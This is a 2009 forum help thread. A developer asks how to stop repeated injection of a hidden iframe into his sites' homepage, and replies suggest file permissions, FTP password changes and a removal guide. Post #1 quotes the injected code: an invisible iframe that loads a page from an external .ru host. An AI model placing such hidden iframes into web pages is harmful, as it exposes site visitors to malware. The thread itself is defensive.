Results 1 to 7 of 7

Thread: [RESOLVED] Website Injection/Attack - [Please Help]

  1. #1

    Thread Starter
    Fanatic Member modpluz's Avatar
    Join Date
    Sep 2005
    Location
    Lag, NG
    Posts
    633

    Resolved [RESOLVED] Website Injection/Attack - [Please Help]

    Good day all, please i urgently need help on this.

    somebody somewhere is attacking my websites(websites designed by me), one of the website is for a University here in my country and exisitng and prospective students are currently registering online(2009/2010 session).

    here is the attack; somehow, somebody is injecting the homepage source code of these websites(index.php) with a code such as this
    Code:
    <iframe src="http://u1a.ru:8080/index.php" width=169 height=187 style="visibility: hidden"></iframe>
    and it is having a serious negative effect on the website, sometimes it renders the web page offline.

    i have always removed the injection each time i come accros it, but how do i prevent this from happening again?

    Thanks
    Last edited by modpluz; Jul 14th, 2009 at 05:01 AM.
    If you want the rabbit to hop, move the carrot - Paul Kellerman(Prison Break)

    onError GoTo http://vbforums.com



    My Bits:
    VB6: Change Column Name in MS ACCESS

  2. #2
    Addicted Member
    Join Date
    Dec 2008
    Posts
    185

    Re: Website Injection/Attack - [Please Help]

    Can you show us the source code of index.php (and any other files that are referenced by the 'include' statement)

  3. #3

    Thread Starter
    Fanatic Member modpluz's Avatar
    Join Date
    Sep 2005
    Location
    Lag, NG
    Posts
    633

    Re: Website Injection/Attack - [Please Help]

    there no files included, and the index.php file contains HTML markups only.

    when i get back to my machine, i'll post the code...but if this helps, the code was inserted directly after the body tag.

    all i did for now was change the ftp password(and i hope it helps my situtation).
    If you want the rabbit to hop, move the carrot - Paul Kellerman(Prison Break)

    onError GoTo http://vbforums.com



    My Bits:
    VB6: Change Column Name in MS ACCESS

  4. #4
    Hyperactive Member
    Join Date
    Dec 2006
    Location
    UK
    Posts
    489

    Re: Website Injection/Attack - [Please Help]

    It's mostly likely your file permissions that's allowing the Iframe to be inserted.

    This might help you out

    Code:
    http://mycodings.blogspot.com/2009/05/remove-malwareiframeinf-virus-from-your.html
    Learning C♯

    Data Binding & Bound Controls - Objects and wizards will never be as intelligent as you, do it yourself! (Unless your Pro)

  5. #5

    Thread Starter
    Fanatic Member modpluz's Avatar
    Join Date
    Sep 2005
    Location
    Lag, NG
    Posts
    633

    Re: Website Injection/Attack - [Please Help]

    ok, i'll check the link out, but meanwhile i changed the permission of the index.php file to 755(also changed the ftp password) and i hope it helps my situation
    If you want the rabbit to hop, move the carrot - Paul Kellerman(Prison Break)

    onError GoTo http://vbforums.com



    My Bits:
    VB6: Change Column Name in MS ACCESS

  6. #6

    Thread Starter
    Fanatic Member modpluz's Avatar
    Join Date
    Sep 2005
    Location
    Lag, NG
    Posts
    633

    Re: Website Injection/Attack - [Please Help]

    Quote Originally Posted by Bopo View Post
    Code:
    http://mycodings.blogspot.com/2009/05/remove-malwareiframeinf-virus-from-your.html
    Thanks a bunch for that link!, it cleared things up for me.
    If you want the rabbit to hop, move the carrot - Paul Kellerman(Prison Break)

    onError GoTo http://vbforums.com



    My Bits:
    VB6: Change Column Name in MS ACCESS

  7. #7
    Hyperactive Member
    Join Date
    Dec 2006
    Location
    UK
    Posts
    489

    Re: [RESOLVED] Website Injection/Attack - [Please Help]

    No problem, glad you got it sorted.
    Learning C♯

    Data Binding & Bound Controls - Objects and wizards will never be as intelligent as you, do it yourself! (Unless your Pro)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width